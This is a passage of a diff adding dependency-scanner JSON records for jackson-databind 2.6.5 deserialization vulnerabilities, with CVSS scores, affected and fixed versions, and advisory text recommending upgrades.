"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", 
+ "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
